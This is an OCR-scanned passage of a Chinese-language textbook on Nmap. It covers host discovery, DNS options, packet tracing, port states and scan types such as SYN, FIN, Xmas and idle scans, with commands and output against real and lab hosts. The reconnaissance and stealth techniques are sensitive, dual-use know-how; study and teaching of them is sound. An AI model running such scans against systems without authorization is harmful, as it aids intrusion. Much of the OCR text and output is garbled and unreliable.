这 里 面 的 协议 域 长 度 为 8 位 。 用 来 标识 是 哪个 协议 向 他 传送 数据 。 比 如 ICMP 为 1， 


IGMP 为 2，TCP 为 6，UDP 为 17，GRE 为 47，ESP 为 50 ^j. 


Nmap 中 允许 向 目标 主机 发 送 IP 数据 包 来 检测 目标 主机 是 否 活跃 ， 理 论 上 可 以 使 用 的 协 


议 多 达 上 百 个 。 这 种 方式 允许 指定 所 要 使 用 的 协议 ， 如 果 不 指定 的 话 ，Nmap 默认 使 




















H ICMP 


(IP 协议 编号 1 )、IGMP (IP 协议 编号 2 ) 和 IP-in-IP (IP 协议 编号 4 ) 三 个 协议 。 另 外 也 可 以 


使 用 参数 -PO 来 指定 所 要 使 用 协议 的 编号 ， 例 如 默认 的 IP 扫描 方式 


Nmap -sP -PO 60.2.22.35 
实际 上 就 相当 于 
Nmap -sP -PO 1,2,4 60.2.22.35 


位 





标识 
固定 部 分 


0 4 8 16 19 24 31 
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(20 字 节 ) 一 


源 地 址 


目的 地 址 


可 变 部 分 可 选 字段 (长 度 可 变 ) 





数据 部 分 
t— — IP 数据 报 一 


发 送 在 前 
图 2-7 
如 果 希 望 使 用 TCP OP 协议 编号 6)、 


Nmap -sP -PO 6,17 60.2.22.35 


另外 ， 这 种 情形 发 出 的 数据 包 内 容 都 


IP 数据 包 格式 
UDP (IP 协议 编号 17 )， 就 可 以 使 用 如 下 命令 。 


是 空 的 ， 这 种 数据 包 很 容易 被 检测 出 来 ， 可 以 使 用 


一 个 --data-length 参数 来 发 送 添加 了 随机 数据 的 数据 包 。 例 如 : 


Nmap --data-length 25  60.2.22.35 


2. Nmap 活跃 主机 发 现 中 与 DNS 协议 相关 的 选项 


2.9.1 DNS 协议 解析 


DNS 是 一 个 几乎 每 天 都 在 使 用 的 协议 ， 但 是 绝 大 多 数 人 并 没有 意识 到 它 的 存在 。 其 实 





tstc.edu.cn 这 样 的 域名 和 如 60.2.22.35 这 村 
站 的 时 候 ， 无 须 记忆 那些 毫 无 意义 的 数字 
就 好 像 你 可 以 轻而易举 地 记 住 你 朋友 的 名 





每 次 在 浏览 器 中 输入 一 个 网 址 的 时 候 ，DNS 协议 其 实 就 在 起 作用 了 。DNS 协议 会 将 如 www. 


ERY IP 地 址 关联 起 来 。 这 样 做 的 好 处 就 是 在 访问 网 
， 只 需要 记 住 一 些 有 意义 的 名 字 就 可 以 了 。 这 一 点 
字 ， 但 是 很 难 记 住 他 的 身份 证 号 码 。 当 要 访问 一 个 
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网 站 却 不 知道 它 的 IP 地 址 时 ， 可 以 使 用 这 些 域名 来 访问 ， 如 果 使 用 的 主机 也 不 知道 这 个 域名 
对 应 的 IP 地 址 的 话 ， 它 就 会 向 DNS 服务 器 发 出 请 求 ， 而 这 个 服务 器 中 存储 了 IP 地 址 与 域名 
的 映射 记录 ， 它 在 接 到 这 个 请 求 以 后 ， 会 将 请 求 中 的 域名 对 应 的 TP 地 址 以 应 答 的 方式 发 回 给 
你 ， 这 样 就 可 以 访问 目标 网 站 了 。 








2.9.2 Nmap 中 的 DNS 选项 


Nmap 在 对 目标 主机 进行 扫描 的 时 候 ， 如 果 目 标 主机 是 一 台 对 外 提供 Web 服务 的 服 
务 器 ,那么 它 除了 有 一 个 全 地 址 之 外 ， 还 会 有 一 个 域名 (例如 本 书 中 的 例子 ，IP 地址 为 
60.2.22.35， 它 的 域名 就 是 www.tstc.edu.cn)。 在 对 一 台 主 机 进行 扫描 的 时 候 ， 如 果 它 有 域名 
的 话 ，Nmap 会 向 域名 服务 器 提出 请 求 ， 显 示 该 IP 所 对 应 的 域名 。 但 是 ， 在 进行 扫描 时 ， 可 
能 扫描 的 是 一 个 范围 ， 在 这 个 范围 内 主机 可 能 有 的 处 于 活跃 状态 ， 而 有 的 却 处 于 非 活跃 状 
态 ， 如 果 直 接 进 行 扫描 ，Nmap 只 会 对 处 于 活跃 状态 的 主机 进行 DNS 转换 ， 而 非 活跃 状态 的 
主机 则 不 予 处 理 。 

从 这 里 起 ， 有 一 部 分 的 显示 结果 采用 Nmap 的 图 形 化 操作 界面 Zenmap 来 显示 ， 关 于 
Zenmap 会 在 后 面 有 详细 的 介绍 ， 这 里 主要 是 为 了 直观 显示 结果 。 图 2-8 展示 了 Zenmap 的 工 
作 界 面 。 现 在 大 家 对 于 Zenmap 的 使 用 方法 只 需要 了 解 两 点 : 在 图 2-8 中 1 处 用 于 输入 Nmap 
的 命令 ，2 处 用 于 显示 Nmap 的 扫描 结果 。 


m denen — M, m M 


















































图 2-8 Zenmap 的 工作 界面 


例如 ， 如 果 希 望 将 所 有 的 目标 I 无论 是 否 是 活跃 主机 所 对 应 的 域名 都 列 出 来 的 话 ， 可 
以 使 用 -R 参数 ， 如 图 2-9 所 示 。 


命令 语法 : Nmap -R [ 目标 IP] 


Bi) IAD ERC) MDH 


Bx 211.81.200.1-20 
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命令 :Nmap -R 211.81.200.1-20 








Nmap: sacer | sae | sues 

















Nmap -R 211.81.200.1-20 - 


Starting Neap 7.30 


Nmap scan report for jpk.tstc.edu.cn (211.81.209.3) 
Most is up (0.0074s latency). 
Not shown: 998 filtered ports 

STATE SERVICE 


Neap scan report for dnsl.tstc.edu.cn (211.81.209.5) 
Most is up (0.00935 latency). 
Not shown: iltered ports 
PORT — STATE SERVICE 


22/tcp open ssh 


S53/tcp open domain 
Be/tcp open http 
443/tcp open https 


Naap scan report for dns2.tstc.edu.cn (211.81.200.6) 
Most is up (6.60905 latency). 
Not shown; 996 filtered ports 

















( https://nmap.org ) at 2016-11-18 13:27 ?D1üsàx)à:)? 














图 2-9 使 用 参数 -R 的 扫描 结果 

如 果 强 制 将 每 一 个 IP 都 转换 为 域名 ， 将 会 耗费 大 量 的 时 间 ， 有 时 可 能 已 经 知道 主机 的 
域名 ， 无 须 进 行 任何 转换 ， 此 时 就 可 以 使 用 -n 参数 来 取消 对 域名 的 转换 ， 如 图 2-10 所 示 。 
这 一 点 在 对 大 规模 的 网 络 进行 扫描 时 效果 极其 明显 。 

命令 语法 : Nmap -n [目标 IP] 


iHa) IAD ERO RMW 


| 上 | 211.81.2001-20 


€: Nmap -r|211.81.200.1-20 





eeveeeeeeee 








[z] ex 








Nmopiis WOEN 





























Nmap -n 211.81.200.1-20 


Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-18 13:30 ?D1útėx?èt?? 
Nmap scan report for 211.81.200.3 

Most is up (0.0225 latency). 

Not shown: 998 filtered ports 

PORT STATE SERVICE 

BO/tcp open http 

SOO0/tcp open upnp 


Neap scan report for 211.81.200.5 


Host is up (8.8215 


Not si iltered ports 
PORT — STATE SERVICE 


22/tcp open ssh 


S3/tcp open domain 
BO/tcp open http 
443/tcp open https 














latency). 





Nsap scan report for 211.81.200.6 
Host is up (0.021s latency). 





Not shown; 996 filtered ports 





图 2-10 





使 用 参数 -n 的 扫描 结果 
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这 里 的 转换 使 用 的 都 是 Nmap 内 置 的 方法 ， 如 果 想 使 用 Nmap 所 在 主机 的 DNS 配置 进 
行 转换 ， 就 可 以 使 用 这 个 参数 。 不 过 这 种 方法 很 少 用 ， 因 为 会 变 慢 。 

如 果 不 想 在 自己 的 DNS 服务 器 留 下 这 次 查询 的 记录 ， 可 能 需要 使 用 指定 的 DNS 服务 器 
来 查询 目标 ， 这 时 就 可 以 使 用 --dns-servers 参数 。 

命令 语法 : Nmap --dns-servers [serverl,server2,etc] [目标 IP] 

下 面 我 们 以 202.99.160.68 作为 DNS 服务 器 来 完成 扫描 。 

Nmap --packet-trace -R --dns-servers 202.99.160.68 211.81.200.8 


从 图 2-11 中 可 以 看 出 ， 整 个 扫描 过 程 中 所 使 用 的 DNS 服务 器 都 是 202.99.160.68。 








P 

e O — — —— 
TG! TRO EEG) HMH | 
Bi: 211612003 -] s& z) 国 e)! 




















:Nmap --packet-trace -R -dhecevere 20299150.58 211812008 


Lamm. me] semis aoran] emae 


EUER Cmn o race -R -dns-servers 20299.16068 21812008 z| = [sa | 






















(): Reed request fron 10D #1 


Dack(): Callback: READ SUCCESS 
».48,200.81.211.in- 






To #1 | 
INFO [11.02285] m nsocc od delete (100 21) 
event delete(). nevent delete on event 466 (type READ) 














e d ae/tcp 
aen] [ti tee open rocbin 

















图 2-11 使 用 参数 --dns-servers 的 扫描 结果 


240 主机 发 现 技术 的 分 析 


“临河 而 姜 鱼 ， 不 如 归 家 织 网 。” 在 我 们 惊叹 Nmap 的 强大 功能 之 时 ， 不 如 动手 研究 它 的 
内 在 机 制 。 也 许 你 就 是 下 一 个 风靡 世界 的 网 络 软件 的 开发 者 。 

Nmap 中 提供 了 --packet-trace 选项 ， 通 过 它 就 可 以 观察 Nmap 发 出 了 哪些 数据 包 ， 收 到 
了 哪些 数据 包 ， 有 了 这 个 研究 方法 ， 可 以 更 深入 地 理解 Nmap 的 运行 原理 。 

使 用 SCTP 的 -PY 选项 对 目标 主机 60.2.22.35 和 192.168.0.1 进行 扫描 。 

首先 扫描 60.2.22.35。 

Nmap -sn -PY 60.2.22.35 


扫描 的 结果 如 下 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-17 12:51 
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Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn 
Nmap done: 1 IP address (0 hosts up) scanned in 3.77 seconds 


这 个 结果 显示 60.2.22.35 的 主机 并 非 活跃 主机 ， 但 是 通过 之 前 的 扫描 可 以 知道 这 台 主 机 
其 实处 于 活跃 状态 ， 得 到 这 样 的 结果 是 因为 目标 主机 并 不 支持 SCTP 协议 。 接 下 来 使 用 同村 
的 选项 来 扫描 192.168.0.1。 

Nmap -sn -PY 192.168.0.1 


扫描 的 结果 如 下 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-17 12:52 
Nmap scan report for 192.168.0.1 

Host is up (0.0040s latency). 

MAC Address: D8:FE:E3:B3:87:A9 (D-Link International 

Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds 


扫描 的 结果 是 该 主机 为 活路 状态 ,但 是 奇怪 的 是 这 台 主 机 也 没有 安装 SCTP 协议 , 但 是 
结果 却 和 上 面 的 完全 不 同 。 这 里 使 用 --packet-trace 选项 来 追踪 Nmap 发 送 的 数据 包 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-17 13:01 

SENT (0.4940s) SCTP 192.168.0.5:40896 > 60.2.22.35:80 ttl=51 id=6676 iplen-52 
SENT (1.4970s) SCTP 192.168.0.5:40897 > 60.2.22.35:80 tt1-50 id-26673 iplen-52 
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn 
Nmap done: 1 IP address (0 hosts up) scanned in 3.71 seconds 


从 这 里 可 以 看 到 ， 在 对 60.2.2235 进行 扫描 时 ，Nmap 发 送 了 SCTP 数据 包 ， 但 是 没有 
收 到 目标 的 应 答 包 ， 因 此 Nmap 判断 目标 主机 状态 为 down， 即 非 活跃 主机 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-17 12:58 
SENT (0.4930s) ARP who-has 192.168.0.1 tell 192.168.0.5 

RCVD (0.4930s) ARP reply 192.168.0.1 is-at D8:FE:E3:B3:87:A9 
Nmap scan report for 192.168.0.1 

Host is up (0.00s latency). 

MAC Address: D8:FE:E3:B3:87:A9 (D-Link International 

Nmap done: 1 IP address (1 host up) scanned in 1.72 seconds 


在 对 192.168.0.1 扫描 时 ， 虽 然 也 使 用 了 -PY 选项 ， 但 是 根本 没有 发 送 SCTP 数据 包 ， 
而 是 使 用 了 ARP 格式 的 请 求 。 

这 其 实 是 由 于 Nmap 的 设计 思路 ，Nmap 会 首先 判断 目标 主机 与 Nmap 所 在 主机 是 否 在 
同一 网 段 ， 如 果 相 同 的话 ， 则 直接 使 用 ARP 扫描 模式 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-17 13:18 

SENT (0.5060s) ICMP [192.168.0.5 » 60.2.22.35 Echo request (type-8/code-0) 
id-4058 seq-0] IP [ttl=53 id-43312 iplen-28 ] 

SENT (0.5160s) TCP 192.168.0.5:38315 > 60.2.22.35:443 S ttl-49 id-52394 
iplen-44  seq-586499036 win-1024 «mss 1460» 

SENT (0.5160s) TCP 192.168.0.5:38315 > 60.2.22.35:80 A ttl1-40 id-40789 iplen-40 
seq-0 win-1024 

SENT (0.5160s) ICMP [192.168.0.5 » 60.2.22.35 Timestamp request (type-13/ 


tt 
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code-0) id=42851 seq-0 orig-0 recv-0 trans=0] IP [ttl-57 id-42214 iplen-40 ] 
RCVD (0.5260s) ICMP [60.2.22.35 » 192.168.0.5 Echo reply (type-0/code-0) 
id-4058 seq-0] IP [ttl=52 id-63979 iplen-28 ] 

Nmap scan report for 60.2.22.35 

Host is up (0.020s latency). 

Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds 


通过 上 面 结 果 可 以 很 清楚 地 看 到 ， 在 没有 任何 指定 的 情况 下 Nmap 会 向 目标 发 送 两 个 
ICMP 数据 包 ， 分 别 为 Echo request 和 Timestamp request， 这 两 个 ICMP 数据 包 的 目标 端口 分 
别 为 443、80。 

这 里 面 使 用 --packet-trace 分 析 了 两 个 问题 。 

O Nmap 在 进行 主机 发 现 的 时 候 ， 无论 你 指定 了 何 种 方式 ，Nmap 都 会 先 判断 一 下 目标 
主机 与 自己 是 否 在 同一 子 网 中 ， 如 果 在 同一 子 网 中 ，Nmap 直接 使 用 ARP 协议 扫描 的 

方式 ， 而 不 会 使 用 你 所 指定 的 方式 。 
O 当 不 指定 扫描 方式 的 时 候 ，Nmap 其 实 发 送 了 4 个 数据 包 。 

















小 结 


本 章 按照 协议 的 不 同 介绍 了 活跃 主机 的 发 现 方式 ， 也 说 明了 如 何 通过 Nmap 使 用 这 些 不 
同 的 协议 来 真正 实现 活跃 主机 发 现 。 然 后 详细 给 出 了 针对 一 个 地 址 的 扫描 过 程 。 在 本 章 的 结 
东 之 际 ， 已 经 掌握 了 以 下 内 容 。 

O 关于 活跃 主机 的 概念 。 

口 活跃 主机 扫描 的 相关 技术 。 

口 Nmap 中 如 何 使 用 这 些 技术 。 

O 如 何 对 Nmap 中 的 这 些 技术 进行 分 析 。 

第 3 章 将 介绍 网 络 扫描 的 另 一 个 重要 概念 一 一 端口 扫描 ， 将 详细 介绍 端口 扫描 的 原理 ， 
以 及 如 何 使 用 Nmap 进行 端口 扫描 。 


CHAPTER 


第 3 章 
端口 扫描 技术 03 


本 章 介绍 如 下 内 容 。 

口 端口 的 概念 。 

口 端口 的 分 类 。 

口 Nmap 中 对 端口 状态 的 定义 。 

Q Nmap 中 的 各 种 端口 扫描 技术 。 

口 Nmap 中 如 何 指定 扫描 端口 的 范围 。 
口 端口 扫描 技术 的 实现 原理 。 

口 端口 扫描 的 算法 。 


3.1 端口 的 概念 


如 果 把 每 一 台 网 络 设备 看 作 一 间 房 子 ， 那么 这 间 房 子 应 该 有 能 够 进去 和 出 来 的 出 入 口 ， 
不 过 一 般 的 房子 只 有 一 个 出 入 口 ， 这 些 出 入 口 是 供 人 们 进出 房子 使 用 的 。 但 是 每 个 网 络 设 
备 却 有 很 多 个 出 入 口 ， 最 多 可 以 达到 65 536 (216) 个 ， 而 这 些 出 入 口 是 供 数据 进出 网 络 设 
备 的 。 

设立 端口 的 目的 其 实 就 是 实现 了 “一 机 多 用 ”。 假 设 没有 端口 技术 ， 一 台 主 机 通常 只 能 
运行 一 种 网 络 服务 ， 总 是 只 有 一 个 程序 进行 网 络 通信 ,那么 只 会 有 一 个 端口 ， 甚 至 没有 端口 
这 个 概念 了 。 正 因为 有 很 多 并 且 将 有 更 多 的 程序 要 通过 网 络 进行 通信 ， 而 所 有 信息 实际 上 都 








e 
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要 通过 网 卡 这 个 接口 出 人， 那么 如 何 区 分 出 入 的 信息 是 给 哪个 程序 使 用 的 呢 ? 这 个 任务 交 由 
操作 系统 处 理 ， 而 它 所 采用 的 机 制 就 是 划分 出 65 536 个 端口 ， 程 序 在 发 送 的 信息 中 加 入 端 
口 编号 ， 而 操作 系统 在 接收 到 信息 后 会 按照 端口 号 将 信息 分 流 到 当前 内 存 中 使 用 该 端口 号 的 
程序 。 











32 ”端口 的 分 类 


根据 端口 使 用 情况 的 不 同 ， 可 以 简单 地 将 端口 分 为 如 下 几 类 : 
口 公认 端口 (well known port) : 这 一 类 端口 是 最 为 常用 的 端口 ， 因 此 也 被 称 为 “常用 端 
口 "。 所 使 用 的 从 0 到 1024 的 端口 都 是 公认 端口 。 通 常 这 些 端 口 已 经 明确 地 和 某 种 服 
务 的 协议 进行 了 关联 ， 一 般 不 应 该 对 其 进行 改变 。 例 如 所 熟知 的 80 端口 运行 的 总 是 
http 通信 ， 而 telnet 也 总 是 适用 23 号 端口 。 这 些 端口 的 作用 一 般 已 经 约定 好 ， 因 此 不 
会 被 其 他 程序 所 使 用 。 
O 注册 端口 〈registered port): 这 部 分 端口 号 的 范围 是 从 1025 到 49 151。 它 们 通常 也 
会 关联 到 一 些 服 务 上 ， 但 是 并 没有 明确 的 规定 ， 不 同 的 程序 可 以 根据 实际 情况 进行 
定义 。 
Q 动态 和 /或 私有 端口 (dynamic and/or private port): 这 部 分 端口 号 的 范围 是 从 49 152 
到 65 535。 一 般 来 说 ， 常 见 的 服务 不 应 该 使 用 这 部 分 端口 ， 但 是 由 于 这 部 分 端口 不 容 
易 引 起 注意 ， 因 此 有 些 程序 尤其 是 一 些 木马 或 者 病毒 程序 十 分 钟爱 这 部 分 端口 。 
另外 ， 根 据 使 用 协议 的 不 同 ， 又 可 以 将 这 些 端 口 分 成 “TCP 协议 端口 ”和 “UDP 协议 
端口 ”两 种 不 同 的 类 型 。 第 2 章 中 我 们 已 经 提 到 过 ， 传 输 层 的 功能 是 为 通信 双方 的 主机 提供 
端 到 端的 服务 ， 这 一 层 的 协议 包括 TCP 协议 和 UDP 协议 。 针 对 使 用 以 上 这 两 种 通信 协议 的 
服务 所 提供 的 端口 ， 也 可 以 分 为 “TCP 协议 端口 ”和 “UDP 协议 端口 ”。 
K 3-1 给 出 了 一 些 常见 的 端口 及 其 对 应 的 服务 。 
表 3-1 常见 的 端口 及 其 对 应 的 服务 与 作用 
































端口 号 名 R 作 A 
1 tcpmux TCP 端口 服务 多 路 复 用 
5 rje 远程 作业 入 口 
7 echo echo 服务 
9 discard 用 于 连接 测试 的 空 服务 
11 systat 用 于 列举 连接 了 的 端口 的 系统 状态 
13 daytime 给 请 求 主机 发 送 日 期 和 时 间 
17 qotd 给 连接 了 的 主机 发 送 每 日 格言 
18 msp 消息 发 送 协议 
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( 续 ) 
端口 号 名 称 ff 用 
19 chargen 字符 生成 服务 ; 发 送 无 止境 的 字符 流 
20 fip-data FTP 数据 端口 
2i fip 文件 传输 协议 (FTP) 端口 ， 有 时 被 文件 服务 协议 
(FSP) 使 用 
22 ssh 安全 Shell (SSH) 服务 
23 telnet telnet 服务 
25 smtp 简单 邮件 传输 协议 (SMTP) 








3.3 Nmap 中 对 端口 状态 的 定义 


本 章 的 主要 目的 是 判断 目标 端口 的 状态 。Nmap 中 对 于 端口 给 出 了 6 种 不 同 的 状态 描述 : 

O open : 如 果 目 标 端口 的 状态 为 open， 这 表明 在 该 端口 有 应 用 程序 接收 TOP 连接 或 者 
UDP 报 文 。 

O closed: 如 果 目 标 端口 的 状态 为 closed， 这 里 要 注意 closed 并 不 意味 着 没有 任何 反应 ， 
状态 为 closed 的 端口 是 可 访问 的 ， 这 种 端口 可 以 接收 Nmap 探测 报 文 并 做 出 响应 。 相 
比较 而 言 ， 没 有 应 用 程序 在 open 上 监听 。 

O filtered: 产生 这 种 结果 的 原因 主要 是 存在 目标 网 络 数据 包 过 滤 ， 由 于 这 些 设备 过 滤 了 
探测 数据 包 ， 导 致 Nmap 无 法 确定 该 端口 是 否 开放 。 这 种 设备 可 能 是 路 由 器 、 防 火 墙 
甚至 专门 的 安全 软件 。 

O unfiltered: 这 种 结果 很 少见 ， 它 表明 目标 端口 是 可 以 访问 的 ， 但 是 Nmap 却 无 法 判断 
它 到 底 是 open 还 是 closed 的 。 通 常 只 有 在 进行 ACK 扫描 时 才 会 出 现 这 种 状态 。 

Q open | filtered: 无 法 确定 端口 是 开放 的 还 是 被 过 滤 了 ， 开 放 的 端口 不 响应 就 是 一 个 例子 。 

O closed[filtered : 无 法 确定 端口 是 关闭 的 还 是 被 过 滤 了 。 只 有 在 使 用 idle 扫描 时 才 
会 发 生 这 种 情况 。 


3.4 Nmap 中 的 各 种 端口 扫描 技术 


Nmap 中 提供 了 大 量 的 技术 来 实现 对 端口 状态 的 检测 ， 由 于 TCP 技术 相对 UDP 技术 要 
复杂 一 些 ， 所 以 TCP 的 检测 手段 也 比 UDP 要 多 一 些 。 第 2 章 已 经 详细 地 介绍 过 TCP 的 工 
作 方 式 ， 可 以 利用 TCP 的 三 次 握手 机 制 ， 产 生 多 种 扫描 技术 。 例 如 最 为 典型 的 是 SYN 和 
Connect 两 种 扫描 方式 。 
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3.4.1 SYN 扫描 


SYN 扫描 是 最 为 流行 的 一 种 扫描 方式 ， 同 时 它 也 是 Nmap 所 采用 的 默认 扫描 方式 。 这 种 
扫描 方式 速度 极 快 ， 可 以 在 一 秒 钟 扫描 上 千 个 端口 ，SYN 扫描 也 不 容易 被 网 络 中 的 安全 设备 
所 发 现 。 

你 也 可 以 在 扫描 的 时 候 输 入 参数 -ss 选项 。 其 实 只 要 你 是 以 root 或 者 administrator fX 
限 工作 的 ， 扫 描 的 形式 都 是 SYN 的 。 首 先 Nmap 会 向 目标 主机 的 一 个 端口 发 送 请 求 连接 的 
SYN 数据 包 ， 而 目标 计算 机 在 接收 到 这 个 SYN 数据 包 之 后 会 以 SYN/ACK 进行 应 答 ，Nmap 
在 收 到 SYN/ACK 后 会 发 送 RST 包 请 求 断 开 连 接 而 不 是 ACK 应 答 。 这 样 ， 三 次 握手 就 没有 
完成 ， 无 法 建立 正常 的 TCP 连接 ， 因 此 ， 这 次 扫描 就 不 会 被 记录 到 系统 日 志 中 。 这 种 扫描 技 
术 一 般 不 会 在 目标 主机 上 留 下 扫描 痕迹 。 

在 对 一 个 端口 进行 TCP SYN 扫描 时 ， 结 果 将 会 是 表 3-2 中 open, closed fil filtered 三 者 
z—. 


表 3-2 对 目标 进行 SYN 扫描 时 目标 主机 的 应 答 与 对 应 端口 的 状态 





目标 主机 的 应 答 目标 端口 的 状态 
E 机 给 出 了 一 个 SYN/ACK 应 答 
机 给 出 了 一 个 RST 应 答 
如 果 目 标 主机 没有 给 出 应 答 


ICMP 无 法 抵达 错误 (KW 3, R1, 2, 3, 4, 10, 13) 


使 用 SYN 扫描 端口 语法 如 下 。 

nmap -sS [target] 

例如 对 目标 192.168.153.131 扫描 ,命令 如 下 。 
nmap -sS 192.168.153.131 


扫描 的 结果 如 下 。 


Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-21 14:43 ?D10 土 EX?e 土 ?? 
Nmap scan report for bogon (192.168.153.131) 

Host is up (0.000030s latency). 

Not shown: 996 closed ports 


















如 果 目 标 3 





closed 
filtered 
filtered 











PORT STATE SERVICE 

21/tcp open ftp 

25/tcp open smtp 

139/tcp open netbios-ssn 
445/tcp open microsoft-dsMAC 


Address: 00:0C:29:90:DF:C3 (VMware) 
Nmap done: 1 IP address (1 host up) scanned in 3.08 seconds 
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3.4.2 Connect 扫描 
使 用 Connect 扫描 端口 的 语法 如 下 。 


nmap -sT [target] 

这 种 扫描 方式 其 实 和 SYN 扫描 很 像 ， 只 是 这 种 扫描 方式 完成 了 TCP 的 三 次 握 导 
扫描 方式 无 须 root 或 者 administrator 权限 。 

例如 对 目标 192.168.153.131 扫描 ， 命 令 如 下 。 

nmap -sT 192.168.153.131 


扫描 的 结果 如 下 。 


Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-21 14:51 
Nmap scan report for bogon (192.168.153.131) 

Host is up (1.00s latency). 

Not shown: 996 closed ports 


m 





。 这 种 


PORT STATE SERVICE 
21/tcp open ftp 

25/tcp open smtp 

53/tcp open domain 
445/tcp open microsoft-ds 


MAC Address: 00:0C:29:90:DF:C3 (VMware) 
Nmap done: 1 IP address (1 host up) scanned in 225.37 seconds 


3.4.3 ”UDP 扫描 


在 使 用 UDP 扫描 (使 用 -sU 选项 ) 对 一 个 端口 进行 UDP 扫描 时 ,结果 是 表 3-3 所 示 的 
open、closed 和 filtered 三 者 之 一 。 
表 3-3 对 目标 进行 UDP 扫描 时 目标 的 应 答 与 对 应 端口 的 状态 








目标 主机 的 应 答 目标 端口 的 状态 
从 目标 端口 得 到 任意 的 UDP 应 答 open 
如 果 目 标 主机 没有 给 出 应 答 open|filtered 
ICMP 端口 无 法 抵达 错误 (类 型 3， 代 码 3 ) closed 
ICMP 无 法 抵达 错误 (类 型 3, 代码 1，2，9，10，13 ) filtered 





要 注意 UDP 扫描 的 速度 是 相当 慢 的 。 使 用 Connect 扫描 端口 的 语法 如 下 。 
nmap -SU [target] 

例如 对 目标 192.168.153.131 的 端口 进行 UDP 扫描 ， 命 令 如 下 。 

nmap -sU 192.168.153.131 


扫描 的 结果 如 下 。 


Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-21 15:00 
Nmap scan report for bogon (192.168.153.131) 
Host is up (0.000080s latency). 
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Not shown: 987 closed ports 


PORT STATE SERVICE 
42/udp open|filtered nameserver 
53/udp open domain 

68/udp open|filtered dhcpc 

135/udp open msrpc 

137/udp open netbios-ns 
138/udp open|filtered netbios-dgm 
445/udp open|filtered microsoft-ds 
500/udp open|filtered isakmp 
1028/udp open|filtered ms-lsa 
1031/udp open|filtered iad2 

1034/udp open activesync-notify 
1035/udp open mxxrlogin 
3456/udp open|filtered IISrpc-or-vat 


MAC Address: 00:0C:29:90:DF:C3 (VMware) 
Nmap done: 1 IP address (1 host up) scanned in 3.74 seconds 


在 扫描 过 程 中 可 能 会 产生 一 些 状态 为 fltered 的 端口 ， 这 些 端 口 的 真实 状态 可 能 是 open, 
也 有 可 能 是 closed。 要 从 这 些 状 态 为 filtered 的 端口 中 找到 那些 其 实 是 open 的 端口 ， 需 要 进 一 
步 的 测试 。 与 TCP RE, UDP 程序 的 服务 通常 不 会 对 Nmap 所 发 送 的 空 数据 包 做 出 回应 ，UDP 
程序 需要 使 用 它们 自己 的 格式 ， 例 如 ， 一 个 SNMP 请 求 数据 包 的 格式 就 与 DHCP 或 者 DNS 的 
请 求 包 的 格式 完全 不 同 。 如 果 保 证 能 向 所 有 常见 的 UDP 服务 发 送 合适 的 数据 包 ，Nmap 需要 
一 个 很 大 的 数据 库 来 存储 这 些 格 式 ，Nmap 将 这 些 数据 包 的 格式 存储 在 Nmap-service-probes 中 。 
可 以 使 用 -sV 或 者 -A (这 两 个 参数 会 在 后 面 内容 中 提 到 )，Nmap 将 会 向 每 个 openlfiltered 的 端口 
发 送 UDP probe， 如 果 目 标 端口 对 任何 一 个 probe 有 了 反应 ， 状 态 都 会 被 修改 为 open。 





3.44 TCP FIN 扫描 


TCP FIN 扫描 方法 向 目标 端口 发 送 一 个 FIN 数据 包 。 按 照 RFC 793 的 规定 ( http://www. 
ietf.org/rfe/rfc0793.txt)， 对 于 所 有 关闭 的 端口 ， 目 标 系统 应 该 返回 RST 标志 。 

使 用 TCP FIN 扫描 端口 的 语法 如 下 。 

nmap -sF [target] 


例如 对 目标 192.168.153.131 进行 扫描 ， 命 令 如 下 。 


nmap -sF 192.168.153.131 


3.4.5 NULL 扫描 


TCP NULL 扫描 方法 是 向 目标 端口 发 送 一 个 不 包含 任何 标志 的 数据 包 。 按 照 RFC 793 的 
规定 ， 对 于 所 有 关闭 的 端口 ， 目 标 系统 应 该 返回 RST 标志 。 
使 用 TCP NULL 扫描 端口 的 语法 如 下 。 


nmap -sN [target] 
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例如 对 目标 192.168.153.131 进行 扫描 ， 命 令 如 下 。 


nmap -sN 192.168.153.131 


3.4.6 Xmas Tree 扫描 


TCP Xmas Tree 扫描 方法 是 向 目标 端口 发 送 一 个 含有 FIN, URG 和 了 PUSH 标志 的 数据 包 。 
按照 RFC 793 的 规定 ， 对 于 所 有 关闭 的 端口 ， 目 标 系 统 应 该 返回 RST 标志 。 

使 用 TCP Xmas Tree 扫描 端口 的 语法 如 下 。 

nmap -sX [target] 

例如 对 目标 192.168.153.131 进行 扫描 ， 命 令 如 下 。 


nmap -sX 192.168.153.131 


3.4.7 idle 扫描 


这 种 扫描 方式 在 思路 上 十 分 巧妙 ， 在 整个 扫描 过 程 中 ,扫描 者 无 须 向 目标 主机 发 送 任何 
数据 包 ， 怎 么 样 ， 是 不 是 光 听 着 就 觉得 十 分 神奇 ? 不 过 ， 不 向 目标 主机 发 送 数据 包 并 不 是 指 
不 发 送 数据 包 ， 在 这 种 扫描 方式 中 ， 需 要 一 个 “第 三 方 "， 它 扮演 了 一 个 被 利用 的 无 素 角 色 ， 
因为 这 个 第 三 方 对 我 们 的 扫描 也 是 一 无 所 知 ， 所 以 我 们 的 扫描 是 隐蔽 的 。 

下 面 介 绍 这 种 扫描 的 原理 。 

步骤 1: 检测 第 三 方 的 了 ID 值 并 记录 下 来 。 

步骤 2 : 在 本 机 上 伪造 一 个 源 地 址 为 第 三 方 主机 的 数据 包 ， 并 将 数据 包 发 送 给 目标 主机 
端口 ， 根 据 目标 端口 状态 的 不 同 ， 目 标 主 机 可 能 会 导致 第 三 方 主机 的 IP ID 值 增加 。 

步骤 3: 再 回来 检查 第 三 方 主机 的 IP ID 值 。 比 较 这 两 次 的 值 。 

这 时 ， 第 三 方 主机 的 IP ID 值 应 该 是 增加 了 1 到 2， 如果 只 是 增加 了 1， 那么 说 明 第 三 
方 主机 在 这 期 间 并 没有 向 外 发 送 数据 包 ， 这 种 情况 就 认为 目标 主机 的 端口 是 关闭 的 。 如 果 
